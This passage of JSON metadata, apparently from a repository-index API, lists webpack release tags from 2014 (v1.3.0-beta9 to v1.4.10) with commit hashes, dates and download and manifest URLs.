.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/web